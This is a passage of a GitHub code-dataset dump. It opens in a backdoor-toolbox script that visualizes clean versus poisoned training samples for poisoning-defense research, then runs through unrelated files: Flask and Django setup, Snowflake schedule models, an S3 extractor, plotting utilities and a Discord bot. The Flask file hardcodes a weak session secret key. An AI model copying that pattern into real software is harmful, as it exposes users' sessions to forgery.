dataset_name=args.dataset,\n target_class=target_class,\n trigger_transform=data_transform,\n is_normalized_input=True,\n alpha=args.alpha if args.test_alpha is None else args.test_alpha,\n trigger_name=args.trigger, args=args)\n\n\nif args.poison_type == 'TaCT':\n source_classes = [config.source_class]\nelse:\n source_classes = None\n\n\nfor vid, path in enumerate(model_list):\n\n ckpt = torch.load(path)\n\n # base model for poison detection\n model = arch(num_classes=num_classes)\n model.load_state_dict(ckpt)\n model = nn.DataParallel(model)\n model = model.cuda()\n model.eval()\n\n\n # Begin Visualization\n print(\"Visualizing model '{}' on {}...\".format(path, args.dataset))\n\n print('[test]')\n tools.test(model, test_set_loader, poison_test=True, poison_transform=poison_transform, num_classes=num_classes, source_classes=source_classes)\n\n\n\n targets = []\n features = []\n clean_features = []\n poisoned_features = []\n\n\n with torch.no_grad():\n for batch_idx, (data, target) in enumerate(poisoned_set_loader):\n data, target = data.cuda(), target.cuda() # train set batch\n targets.append(target)\n _, feature = model.forward(data, return_hidden=True)\n features.append(feature.cpu().detach())\n\n targets = torch.cat(targets, dim=0)\n targets = targets.cpu()\n features = torch.cat(features, dim=0)\n ids = torch.tensor(list(range(len(poisoned_set))))\n\n if len(poison_indices) == 0:\n\n if args.method == 'pca':\n visualizer = PCA(n_components=2)\n elif args.method == 'tsne':\n visualizer = TSNE(n_components=2)\n else:\n raise NotImplementedError('Visualization Method %s is Not Implemented!' % args.method)\n\n non_poison_indices = list(set(list(range(len(poisoned_set)))) - set(poison_indices.tolist()))\n #print(non_poison_indices)\n clean_targets = targets[non_poison_indices]\n print(\"Total Clean:\", len(clean_targets))\n print(\"Total Poisoned:\", 0)\n\n clean_features = features[non_poison_indices]\n\n class_clean_features = clean_features[clean_targets == target_class]\n clean_ids = ids[non_poison_indices]\n class_clean_ids = clean_ids[clean_targets == target_class]\n\n reduced_features = visualizer.fit_transform(\n class_clean_features) # all features vector under the label i\n\n #plt.scatter(reduced_features[:, 0], reduced_features[:, 1], facecolors='none', marker='o',\n # color='blue', label='clean')\n\n plt.scatter(reduced_features[:, 0], reduced_features[:, 1], marker='o', color='blue', s=5, alpha=0.5)\n plt.axis('off')\n save_path = 'assets/%s_%s_%s_class=%d.png' % (args.method, supervisor.get_dir_core(args, include_poison_seed=True), alias_list[vid], target_class)\n plt.savefig(save_path)\n print(\"Saved figure at {}\".format(save_path))\n plt.clf()\n\n else:\n\n\n non_poison_indices = list(set(list(range(len(poisoned_set)))) - set(poison_indices.tolist()))\n\n clean_targets = targets[non_poison_indices]\n poisoned_targets = targets[poison_indices]\n\n print(\"Total Clean:\", len(clean_targets))\n print(\"Total Poisoned:\", len(poisoned_targets))\n\n clean_features = features[non_poison_indices]\n poisoned_features = features[poison_indices]\n\n clean_ids = ids[non_poison_indices]\n poisoned_ids = ids[poison_indices]\n\n class_clean_features = clean_features[clean_targets == target_class]\n class_poisoned_features = poisoned_features[poisoned_targets == target_class]\n class_clean_ids = clean_ids[clean_targets == target_class]\n class_poisoned_ids = poisoned_ids[poisoned_targets == target_class]\n\n num_clean = len(class_clean_features)\n num_poisoned = len(class_poisoned_features)\n\n feats = torch.cat([class_clean_features, class_poisoned_features], dim=0)\n ids = list(range(0,len(feats)))\n random.shuffle(ids)\n #class_clean_features = feats[ids[:num_clean]]\n #class_poisoned_features = feats[ids[-num_poisoned:]]\n # class_poisoned_features = poisoned_features\n\n\n class_clean_mean = class_clean_features.mean(dim=0)\n print(class_clean_mean.shape)\n clean_dis = torch.norm(class_clean_features - class_clean_mean, dim=1).mean()\n poison_dis = torch.norm(class_poisoned_features - class_clean_mean, dim=1).mean()\n print('clean_dis: %f, poison_dis: %f' % (clean_dis, poison_dis))\n\n tmp_labels = [0] * len(class_clean_features) + [1] * len(class_poisoned_features)\n silhouette = silhouette_score(feats, tmp_labels)\n print('Silhouette Score:', silhouette)\n # exit()\n\n if args.method == 'pca':\n visualizer = PCA(n_components=2)\n elif args.method == 'tsne':\n visualizer = TSNE(n_components=2)\n elif args.method == 'oracle':\n visualizer = oracle_visualizer()\n elif args.method == 'mean_diff':\n visualizer = mean_diff_visualizer()\n elif args.method == 'SS':\n visualizer = spectral_visualizer()\n else:\n raise NotImplementedError('Visualization Method %s is Not Implemented!' % args.method)\n\n\n if args.method == 'oracle':\n clean_projection, poison_projection = visualizer.fit_transform(class_clean_features,\n class_poisoned_features)\n # print(clean_projection)\n # print(poison_projection)\n\n # bins = np.linspace(-2, 2, 100)\n plt.figure(figsize=(7, 5))\n # plt.xlim([-3, 3])\n plt.ylim([0, 100])\n\n plt.hist(clean_projection, bins='doane', color='blue', alpha=0.5, label='Clean', edgecolor='black')\n plt.hist(poison_projection, bins='doane', color='red', alpha=0.5, label='Poison', edgecolor='black')\n \n # plt.xlabel(\"Distance\")\n # plt.ylabel(\"Number\")\n # plt.axis('off')\n # plt.legend()\n elif args.method == 'mean_diff':\n clean_projection, poison_projection = visualizer.fit_transform(class_clean_features, class_poisoned_features)\n # all_projection = torch.cat((clean_projection, poison_projection), dim=0)\n\n # bins = np.linspace(-5, 5, 50)\n plt.figure(figsize=(7, 5))\n\n # plt.hist(all_projection.cpu().detach().numpy(), bins='doane', alpha=1, label='all', linestyle='dashed', color='black', histtype=\"step\", edgecolor='black')\n plt.hist(clean_projection.cpu().detach().numpy(), color='blue', bins='doane', alpha=0.5, label='Clean', edgecolor='black')\n plt.hist(poison_projection.cpu().detach().numpy(), color='red', bins='doane', alpha=0.5, label='Poison', edgecolor='black')\n \n plt.xlabel(\"Distance\")\n plt.ylabel(\"Number\")\n plt.legend()\n elif args.method == 'SS':\n clean_projection, poison_projection = visualizer.fit_transform(class_clean_features, class_poisoned_features)\n # all_projection = torch.cat((clean_projection, poison_projection), dim=0)\n\n # bins = np.linspace(-5, 5, 50)\n plt.figure(figsize=(7, 5))\n plt.ylim([0, 300])\n\n # plt.hist(all_projection.cpu().detach().numpy(), bins='doane', alpha=1, label='all', linestyle='dashed', color='black', histtype=\"step\", edgecolor='black')\n plt.hist(clean_projection.cpu().detach().numpy(), color='blue', bins='doane', alpha=0.5, label='Clean', edgecolor='black')\n plt.hist(poison_projection.cpu().detach().numpy(), color='red', bins=20, alpha=0.5, label='Poison', edgecolor='black')\n \n plt.xlabel(\"Distance\")\n plt.ylabel(\"Number\")\n plt.legend()\n else:\n reduced_features = visualizer.fit_transform( torch.cat([class_clean_features, class_poisoned_features], dim=0) ) # all features vector under the label\n\n plt.scatter(reduced_features[:num_clean, 0], reduced_features[:num_clean, 1], marker='o', s=5,\n color='blue', alpha=1.0)\n plt.scatter(reduced_features[num_clean:, 0], reduced_features[num_clean:, 1], marker='^', s=8,\n color='red', alpha=0.7)\n\n\n plt.axis('off')\n\n\n save_path = 'assets/%s_%s_%s_class=%d.png' % (args.method, supervisor.get_dir_core(args, include_poison_seed=True), alias_list[vid], target_class)\n plt.tight_layout()\n plt.savefig(save_path)\n print(\"Saved figure at {}\".format(save_path))\n\n plt.clf()","repo_name":"vtu81/backdoor-toolbox","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":16110,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"53"} +{"seq_id":"17090601550","text":"from flask import Flask\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\n\napp = Flask(__name__)\napp.secret_key = \"Boogie\"\nlimiter = Limiter(\n app,\n key_func=get_remote_address, # get users IP address.\n default_limits=[\"200 per day\", \"50 per hour\"], # default limit to 300K request per month\n)","repo_name":"MXMaddux/song-a-gram","sub_path":"flask_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5586821976","text":"\"\"\"NIPPI URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^analytics/', include('analytics.urls', namespace = \"analytics\")),\n url(r'^management/', include('management.urls', namespace = \"management\")),\n url(r'^nips/', include('nips.urls', namespace = \"nips\")),\n url(r'^receiver/', include('receiver.urls', namespace = \"receiver\")),\n url(r'^analytrecordsics/', include('records.urls', namespace = \"records\")),\n url(r'^siren/', include('siren.urls', namespace = \"siren\")),\n]\n","repo_name":"RichardSmith159/NIPPI","sub_path":"NIPPI/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37151080224","text":"import uuid\nfrom typing import Optional, ClassVar\nimport datetime\nfrom .base import BaseOpsCenterModel\nfrom pydantic import validator, root_validator, Field\n\n\ndef format_suspend_minutes(value):\n if value == 0:\n return \"\"\n elif value == 1:\n return \"1 minute\"\n else:\n return f\"{value} minutes\"\n\n\n## Adjust sizes\nclass WarehouseSchedules(BaseOpsCenterModel):\n table_name: ClassVar[str] = \"WH_SCHEDULES\"\n col_widths: ClassVar[dict] = {\n \"start_at\": (\"Start\", 1),\n \"finish_at\": (\"Finish\", 1),\n \"size\": (\"Size\", 1),\n \"suspend_minutes\": (\"Suspend\", 1, format_suspend_minutes),\n \"resume\": (\"Resume\", 1),\n \"scale_min\": (\"Scale Min\", 1, lambda x: max(x, 1)),\n \"scale_max\": (\"Scale Max\", 1, lambda x: max(x, 1)),\n \"warehouse_mode\": (\"Mode\", 1),\n \"comment\": (\"Comment\", 1),\n }\n id_val: str = Field(default_factory=lambda: uuid.uuid4().hex)\n name: str\n start_at: datetime.time = datetime.time.min\n finish_at: datetime.time = datetime.time.max.replace(microsecond=0, second=0)\n size: str\n suspend_minutes: int\n resume: bool\n scale_min: int\n scale_max: int\n warehouse_mode: str\n comment: Optional[str] = None\n weekday: bool = True\n day: Optional[str] = None\n enabled: bool = False\n _dirty: bool = False\n\n class Config:\n underscore_attrs_are_private = True\n # allow_mutation = False\n\n def get_id_col(self) -> str:\n return \"id_val\"\n\n def get_id(self) -> str:\n return self.id_val\n\n @validator(\"name\", allow_reuse=True)\n def verify_name(cls, v):\n if not v:\n raise ValueError(\"Name is required\")\n assert isinstance(v, str)\n return v\n\n @validator(\"start_at\", \"finish_at\", allow_reuse=True)\n def verify_time(cls, v):\n if v is None:\n raise ValueError(\"Time is required\")\n assert isinstance(v, datetime.time)\n assert (\n datetime.time.min <= v <= datetime.time.max.replace(microsecond=0, second=0)\n )\n return v\n\n @validator(\"size\", allow_reuse=True)\n def verify_size(cls, v):\n if not v:\n raise ValueError(\"Size is required\")\n assert isinstance(v, str)\n assert v in _WAREHOUSE_SIZE_OPTIONS\n return v\n\n @validator(\"suspend_minutes\", allow_reuse=True)\n def verify_suspend_minutes(cls, v):\n if v is None:\n raise ValueError(\"Suspend minutes is required\")\n assert isinstance(v, int)\n assert v >= 0\n return v\n\n @validator(\"resume\", \"weekday\", \"enabled\", allow_reuse=True)\n def verify_resume(cls, v):\n if v is None:\n raise ValueError(\"Resume is required\")\n assert isinstance(v, bool)\n return v\n\n @validator(\"scale_min\", \"scale_max\", allow_reuse=True)\n def verify_scale(cls, v):\n if v is None:\n raise ValueError(\"Scale is required\")\n assert isinstance(v, int)\n assert 10 >= v >= 0\n return v\n\n @validator(\"warehouse_mode\", allow_reuse=True)\n def verify_warehouse_mode(cls, v):\n if not v:\n raise ValueError(\"Warehouse mode is required\")\n assert isinstance(v, str)\n assert v in _WAREHOUSE_MODE_OPTIONS\n return v\n\n @root_validator(allow_reuse=True)\n @classmethod\n def verify_start_finish(cls, values):\n start_at = values.get(\"start_at\", datetime.time.min)\n finish_at = values.get(\n \"finish_at\", datetime.time.max.replace(microsecond=0, second=0)\n )\n if start_at and finish_at and start_at >= finish_at:\n raise ValueError(\"Start time must be before finish time\")\n return values\n\n @root_validator(allow_reuse=True)\n @classmethod\n def verify_scales(cls, values):\n scale_min = values.get(\"scale_min\", 0)\n scale_max = values.get(\"scale_max\", 0)\n if scale_min >= 0 and scale_max >= 0 and scale_min > scale_max:\n raise ValueError(\"Scale min must be less than scale max\")\n return values\n\n\n_WAREHOUSE_SIZE_OPTIONS = [\n \"X-Small\",\n \"Small\",\n \"Medium\",\n \"Large\",\n \"X-Large\",\n \"2X-Large\",\n \"3X-Large\",\n \"4X-Large\",\n \"5X-Large\",\n \"6X-Large\",\n \"Medium Snowpark\",\n \"Large Snowpark\",\n \"X-Large Snowpark\",\n \"2X-Large Snowpark\",\n \"3X-Large Snowpark\",\n \"4X-Large Snowpark\",\n]\n\n_WAREHOUSE_MODE_OPTIONS = [\n \"Standard\",\n \"Economy\",\n \"Inherit\",\n]\n","repo_name":"sundeck-io/OpsCenter","sub_path":"app/crud/wh_sched.py","file_name":"wh_sched.py","file_ext":"py","file_size_in_byte":4461,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"28462261823","text":"from extract.modules.s3_utilities import (\n s3_delete_objects,\n s3_read_sql,\n)\nfrom extract.modules.csv_utilities import (\n create_csv_writer,\n)\nfrom extract.modules.glue_utilities import (\n format_sql_row,\n test_chunk_size,\n)\nimport boto3\nfrom typing import Union\nfrom sqlalchemy import text\nfrom sqlalchemy.engine import Engine\n\nclass QueryExtract:\n def __init__(\n self,\n name: str,\n bucket: str,\n key: str,\n has_bookmark: bool,\n bookmark: str,\n chunks: int,\n rows: int\n ):\n self.name = name,\n self.bucket = bucket\n self.key = key\n self.has_bookmark = has_bookmark\n self.bookmark = bookmark\n self.chunks = chunks\n self.rows = rows\n\n def delete(self):\n s3_delete_objects(self.bucket, self.key)\n\nclass Query:\n def __init__(\n self,\n name: str,\n bucket: str,\n key: str,\n parameters: Union[dict, None],\n bookmark: Union[str, None],\n engine: Engine\n ):\n params = {} if parameters is None else parameters\n try:\n query = s3_read_sql(bucket, key)\n try:\n query = query.format(**params)\n except Exception as e:\n raise Exception(\"Not all query parameters were defined.\")\n query = text(query)\n if 'BOOKMARK' in query.compile(engine).params:\n has_bookmark = True\n query = query.bindparams(BOOKMARK = bookmark)\n warning = None\n else:\n has_bookmark = False\n if bookmark is not None:\n warning = ''.join([\n f\"Bookmark was set to `{bookmark}`, however query does not \",\n \"contain the `:BOOKMARK` specification. Bookmark set \",\n \"to `None`.\"\n ])\n bookmark = None\n else:\n warning = None\n except Exception as error:\n raise error\n else:\n self.name = name\n self.query = query\n self.parameters = parameters\n self.has_bookmark = has_bookmark\n self.bookmark = bookmark\n self.engine = engine\n self._warning = warning\n\n def show_query(self):\n print(str(self.query.compile(compile_kwargs={\"literal_binds\": True})))\n\n def extract(\n self,\n bucket: str,\n key: str,\n metadata: Union[dict, None] = None,\n chunk_size: int = 100000,\n chunk_memory: int = 90,\n stream_size: int = 5000,\n verbose = True,\n printer = print\n ) -> QueryExtract:\n try:\n s3 = boto3.client('s3')\n metadata = {} if metadata is None else metadata\n chunk_key = f'{key}/chunk_{{n}}.csv'\n chunk_test_at = chunk_size * 0.01\n result_empty = True\n chunk_n = 1\n bookmark = self.bookmark\n n = 0\n with self.engine.connect().execution_options(yield_per = stream_size) as con:\n result = con.execute(self.query)\n fields = list(result.keys())\n if self.has_bookmark:\n bm_i = fields.index('____')\n else:\n bm_i = len(fields)\n buffer, writer = create_csv_writer()\n writer.writerow(fields)\n fields_str_len = len(buffer.getvalue())\n if verbose:\n printer(f'Extracting chunk {chunk_n}')\n for i, row in enumerate(result):\n n = i + 1\n if n == 1:\n result_empty = False\n if self.has_bookmark:\n bookmark = str(format_sql_row(row, len(fields))[bm_i])\n if n % chunk_size:\n writer.writerow(format_sql_row(row, bm_i))\n if n == chunk_test_at:\n chunk_size = test_chunk_size(\n buffer = buffer,\n n_rows = chunk_test_at,\n max_rows = chunk_size,\n max_size = chunk_memory\n )\n if n == chunk_size:\n if verbose:\n printer(f'Writing chunk {chunk_n}')\n write_response = s3.put_object(\n Bucket = bucket,\n Key = chunk_key.format(n = str(chunk_n).zfill(7)),\n Body = buffer.getvalue(),\n Metadata = metadata\n )\n chunk_n += 1\n buffer, writer = create_csv_writer()\n else:\n writer.writerow(format_sql_row(row, bm_i))\n if verbose:\n printer(f'Writing chunk {chunk_n}')\n write_response = s3.put_object(\n Bucket = bucket,\n Key = chunk_key.format(n = str(chunk_n).zfill(7)),\n Body = buffer.getvalue(),\n Metadata = metadata\n )\n chunk_n += 1\n buffer, writer = create_csv_writer()\n writer.writerow(fields)\n if verbose:\n printer(f'Extracting chunk {chunk_n}')\n if len(buffer.getvalue()) > fields_str_len:\n if verbose:\n printer(f'Writing chunk {chunk_n}')\n write_response = s3.put_object(\n Bucket = bucket,\n Key = chunk_key.format(n = str(chunk_n).zfill(7)),\n Body = buffer.getvalue(),\n Metadata = metadata\n )\n else:\n if verbose:\n printer('Nothing to extract')\n chunk_n -= 1\n return(QueryExtract(\n name = self.name,\n bucket = bucket,\n key = key,\n has_bookmark = self.has_bookmark,\n bookmark = bookmark,\n chunks = 0 if result_empty else chunk_n,\n rows = n\n ))\n except Exception as error:\n error = ''.join([\n f\"Failed to extract table: {error} \",\n f'Removing all chunks from s3//{bucket}/{key}.'\n ])\n try:\n s3_delete_objects(bucket, key)\n error = f'{error} Successfully removed all chunks.'\n except Exception as del_error:\n error = f'{error} Failed to remove all chunks. {del_error}'\n raise Exception(error)","repo_name":"jjd-bailey/python_dev_tools","sub_path":"extract/modules/extract_query.py","file_name":"extract_query.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23082619586","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/9/27 下午6:03\n# @Author : Hou Rong\n# @Site : \n# @File : TestBooking.py\n# @Software: PyCharm\nimport unittest\nimport json\nfrom proj.my_lib.new_hotel_parser.booking_parser import booking_parser\nfrom mioji.common.ufile_handler import download_file\n\n\ndef test_booking_parser(page):\n return booking_parser(page,\n url='',\n other_info={'source_id': 'test', 'city_id': 'test'}\n )\n\n\nclass TestBooking(unittest.TestCase):\n def test_name(self):\n name_cases = ['b36a1e904c0cf44784e36f29f3eba11e']\n name_result = [('', 'Penzi\\xc3\\xb3n Rogalo')]\n for case, res in zip(name_cases, name_result):\n page = download_file(case)\n j_data = json.loads(page)\n result = test_booking_parser(j_data['data'])\n self.assertTupleEqual((result.hotel_name, result.hotel_name_en), res)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"20113261/platform_service","sub_path":"test/hotel_detail/TestBooking.py","file_name":"TestBooking.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10056087503","text":"from typing import Tuple, List, Union\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nfrom imageio import mimsave\nfrom cv2 import resize\n\n\ndef clim(in_content: np.ndarray, ratio: float = 95) -> Tuple[float, float]:\n c = np.percentile(np.absolute(in_content), ratio)\n return -c, c\n\n\ndef explode_volume(volume: np.ndarray, t: int = None, x: int = None, y: int = None,\n figsize: tuple = (8, 8), cmap: str = 'bone', clipval: tuple = None, p: int = 98,\n tlim: tuple = None, xlim: tuple = None, ylim: tuple = None, labels : list = ('[s]', '[km]', '[km]'),\n ratio: tuple = None, linespec: dict = None,\n filename: str or Path = None, save_opts: dict = None) -> plt.figure:\n if linespec is None:\n linespec = dict(ls='-', lw=1, color='orange')\n nt, nx, ny = volume.shape\n t_label, x_label, y_label = labels\n \n t = t if t is not None else nt//2\n x = x if x is not None else nx//2\n y = y if y is not None else ny//2\n\n if tlim is None:\n t_label = \"samples\"\n tlim = (0, volume.shape[0])\n if xlim is None:\n x_label = \"samples\"\n xlim = (0, volume.shape[1])\n if ylim is None:\n y_label = \"samples\"\n ylim = (0, volume.shape[2])\n \n # vertical lines for coordinates reference\n tline = (tlim[1] - tlim[0]) / nt * t + tlim[0]\n xline = (xlim[1] - xlim[0]) / nx * x + xlim[0]\n yline = (ylim[1] - ylim[0]) / ny * y + ylim[0]\n \n # instantiate plots\n fig = plt.figure(figsize=figsize)\n if ratio is None:\n wr = (nx, ny)\n hr = (ny, nx)\n else:\n wr = ratio[0]\n hr = ratio[1]\n opts = dict(cmap=cmap, clim=clipval if clipval is not None else clim(volume, p), aspect='auto')\n gs = fig.add_gridspec(2, 2, width_ratios=wr, height_ratios=hr,\n left=0.1, right=0.9, bottom=0.1, top=0.9,\n wspace=0.0, hspace=0.0)\n ax = fig.add_subplot(gs[1, 0])\n ax_top = fig.add_subplot(gs[0, 0], sharex=ax)\n ax_right = fig.add_subplot(gs[1, 1], sharey=ax)\n \n # central plot\n ax.imshow(volume[:, :, y], extent=[xlim[0], xlim[1], tlim[1], tlim[0]], **opts)\n ax.axvline(x=xline, **linespec)\n ax.axhline(y=tline, **linespec)\n \n # top plot\n ax_top.imshow(volume[t].T, extent=[xlim[0], xlim[1], ylim[1], ylim[0]], **opts)\n ax_top.axvline(x=xline, **linespec)\n ax_top.axhline(y=yline, **linespec)\n ax_top.invert_yaxis()\n \n # right plot\n ax_right.imshow(volume[:, x], extent=[ylim[0], ylim[1], tlim[1], tlim[0]], **opts)\n ax_right.axvline(x=yline, **linespec)\n ax_right.axhline(y=tline, **linespec)\n \n # labels\n ax_top.tick_params(axis=\"x\", labelbottom=False)\n ax_right.tick_params(axis=\"y\", labelleft=False)\n ax.set_xlabel(\"x \" + x_label)\n ax.set_ylabel(\"t \" + t_label)\n ax_right.set_xlabel(\"y \" + y_label)\n ax_top.set_ylabel(\"y \" + y_label)\n \n if filename is not None:\n if save_opts is None:\n save_opts = {'format': 'png', 'dpi': 150, 'bbox_inches': 'tight'}\n plt.savefig(f\"{filename}.{save_opts['format']}\", **save_opts)\n plt.show()\n\n\ndef gif_from_array(in_content: np.ndarray, filename: str or Path,\n clipval: tuple = None, p: int = 98, axis: int = 0,\n width: int = None, height: int = None, **kwargs) -> None:\n if clipval is None:\n clipval = clim(in_content, p)\n if axis > in_content.ndim:\n raise ValueError(\"Provided dir has to be a in_content dimension\")\n \n in_content = np.clip(in_content, clipval[0], clipval[1])\n in_content = (in_content - clipval[0]) / (clipval[1] - clipval[0])\n in_content = (in_content * 255).astype(np.uint8)\n \n if axis != 0:\n in_content = np.swapaxes(in_content, axis, 0)\n \n frames = [in_content[_].T for _ in range(in_content.shape[0])]\n \n if width is not None and height is not None:\n dim = (width, height)\n frames = [resize(f, dim) for f in frames]\n \n mimsave(filename, frames, 'GIF', **kwargs)\n\n\ndef seismograms(in_content: np.ndarray, ax, tlim: tuple = None, xlim: tuple = None,\n gain: float = 1., color: Union[str, Tuple[str]] = 'black') -> None:\n if isinstance(color, str):\n color = (color, color)\n elif isinstance(color, tuple):\n assert len(color) == 2, \"color has to be a tuple of 2 elements\"\n else:\n raise ValueError(\"color has to be a tuple of 2 elements\")\n \n tlim_ = tlim if tlim is not None else (0, in_content.shape[0])\n xlim_ = xlim if xlim is not None else (1, in_content.shape[1])\n \n t_axis = np.linspace(tlim_[0], tlim_[1], in_content.shape[0])\n x_axis = np.linspace(xlim_[0], xlim_[1], in_content.shape[1])\n \n for idx, x in enumerate(x_axis):\n trace = in_content[:, idx] * gain + x\n ax.fill_betweenx(t_axis, trace, x, where=trace >= x, facecolor=color[0])\n ax.fill_betweenx(t_axis, trace, x, where=trace <= x, facecolor=color[1])\n \n ax.set_ylim(tlim_[0], tlim_[1])\n ax.invert_yaxis()\n\n ax.set_xticks(x_axis)\n ax.tick_params(axis='x', size=2, width=1)\n ax.xaxis.set_label_position('top')\n ax.xaxis.set_ticks_position('top')\n\n ax.grid(b=True, which='major', axis='y')\n\n\ndef plot_gather(gather: np.ndarray, figsize: tuple = (8, 8), cmap: str = 'bone',\n clipval: tuple = None, p: int = 98, tlim: tuple = None, xlim: tuple = None,\n labels: list = ('[s]', '[km]'), filename: str or Path = None) -> plt.figure:\n \n t_label, x_label = labels\n \n if tlim is None:\n t_label = \"samples\"\n tlim = (0, gather.shape[0])\n if xlim is None:\n x_label = \"samples\"\n xlim = (0, gather.shape[1])\n\n # instantiate plots\n plt.figure(figsize=figsize)\n\n plt.imshow(gather, cmap=cmap, aspect='auto',\n clim=clipval if clipval is not None else clim(gather, p),\n extent=[xlim[0], xlim[1], tlim[1], tlim[0]])\n\n plt.xlabel(\"x \" + x_label)\n plt.ylabel(\"t \" + t_label)\n\n if filename is not None:\n plt.savefig(filename, bbox_inches='tight', dpi=150)\n plt.show()\n\n\n__all__ = [\n \"clim\",\n \"explode_volume\",\n \"gif_from_array\",\n \"seismograms\",\n \"plot_gather\",\n]\n","repo_name":"polimi-ispl/deep_prior_interpolation","sub_path":"utils/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"15115789161","text":"from discord.ext import commands, tasks\nimport discord\nimport asyncio\nimport os\nfrom helper import RankingDb\nimport json\nfrom datetime import datetime\nimport time\nfrom helper import discord_common\nfrom helper import graph_common as gc\nfrom helper.common import DayFilter\nfrom helper import common\nfrom matplotlib import pyplot as plt\nfrom typing import List\nfrom helper import badge\n\n\nBASE_PROBLEM_URL = 'https://codeforces.com/group/FLVn1Sc504/contest/{0}/problem/{1}'\n\nTAGS = ['Dynamic programming', 'Data structure', 'Geometry', 'Graph', 'Math', 'String', 'Ad-hoc', 'Other']\n\n\ndef _plot_rating(resp, mark='o', labels: List[str] = None, MAX_SCORE=100):\n labels = [''] * len(resp) if labels is None else labels\n\n for user, label in zip(resp, labels):\n ratings, dates = [], []\n for rating, date in user:\n ratings.append(rating)\n dates.append(datetime.strptime(date, \"%Y/%m/%d\"))\n plt.plot(dates,\n ratings,\n linestyle='-',\n marker=mark,\n markersize=3,\n markerfacecolor='white',\n markeredgewidth=0.5,\n label=label)\n\n gc.plot_rating_bg(badge.RATED_RANKS, MAX_SCORE)\n plt.gcf().autofmt_xdate()\n\n\ndef days_between(d1, d2=None):\n if d2 is None:\n d2 = datetime.today()\n d1 = datetime.strptime(d1, \"%Y/%m/%d\")\n return (d2 - d1).days\n\ndef to_message(p):\n # p[0][0] -> name\n # p[0][1] -> links\n # p[0][2] -> cnt_AC\n # p[1] -> result\n # p[2] -> DATE\n links = p[0][1].strip(',').split(',')\n links = list(map(lambda x: BASE_PROBLEM_URL.format(x.split('/')[0], x.split('/')[1]), links))\n msg = \"\"\n if len(links) == 1:\n msg = \"[{0}]({1}) \".format(p[0][0], links[0])\n else:\n msg = \"[{0}]({1}) \".format(p[0][0], links[0])\n for i, link in enumerate(links[1:]):\n msg += \"[link{0}]({1}) \".format(i + 2, link)\n diff = days_between(p[2])\n if diff == 1:\n msg += \"(1 day ago)\"\n elif diff > 1:\n msg += \"({0} days ago)\".format(diff)\n return msg\n\n\nclass Graph(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.tag = {}\n data = json.load(open('database/problem_tag.json'))\n for x in data:\n self.tag[x] = data[x]\n\n @commands.command(brief=\"Biểu đồ các bài đã giải theo tag.\",\n usage='[handle] [d>=[[dd]mm]yyyy] [d<[[dd]mm]yyyy]')\n async def tagbar(self, ctx, *args):\n \"\"\"\n Hiện biểu đồ các bài đã giải theo tag của nick codeforces tương ứng.\n Ví dụ ;voj tagbar CKQ\n \"\"\"\n filt = DayFilter()\n handle = filt.parse(args)\n handle = await common.get_handle(ctx, handle)\n if handle is None:\n return\n #name result date\n problem_list = RankingDb.RankingDb.get_info_solved_problem(handle)\n problem_list = list(filter(lambda x: x[1] >= 100 - 0.1, problem_list))\n problem_list = list(filter(lambda x: filt.filter(datetime.strptime(x[2], '%Y/%m/%d')), problem_list))\n if len(problem_list) == 0:\n await ctx.send('Không tìm thấy submission của `{0}` với các tham số hiện tại.'.format(handle))\n return\n\n cnt = {'No tag' : 0}\n for tag in TAGS:\n cnt[tag] = 0\n for name, *junks in problem_list:\n name = name[:name.find('-')].strip()\n tags = []\n if name not in self.tag:\n tags = ['No tag']\n else:\n tags = self.tag[name]\n for tag in tags:\n if tag not in cnt:\n cnt[tag] = 0\n cnt[tag] += 1\n #///\n plt.clf()\n plt.xlabel('Tag')\n plt.ylabel('Number solved')\n x_pos = list(range(len(TAGS)))\n colors = ['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple', 'tab:pink', 'tab:olive', 'tab:cyan']\n plt.bar(x_pos, [cnt[x] for x in TAGS], color=colors)\n plt.xticks(x_pos, TAGS)\n for index, value in enumerate(TAGS):\n if cnt[value] < 10:\n plt.text(index - 0.1, cnt[value], str(cnt[value]))\n elif cnt[value] < 100:\n plt.text(index - 0.15, cnt[value], str(cnt[value]))\n else:\n plt.text(index - 0.25, cnt[value], str(cnt[value]))\n \n total = len(problem_list)\n plt.legend(title=f\"{handle}: {total} ({cnt['No tag']} no tag)\",\n title_fontsize=plt.rcParams['legend.fontsize'])\n plt.gcf().autofmt_xdate()\n discord_file = gc.get_current_figure_as_file()\n embed = discord_common.cf_color_embed(\n title='Số lượng bài giải được trong từng category')\n discord_common.attach_image(embed, discord_file)\n discord_common.set_author_footer(embed, ctx.author)\n await ctx.send(embed=embed, file=discord_file)\n 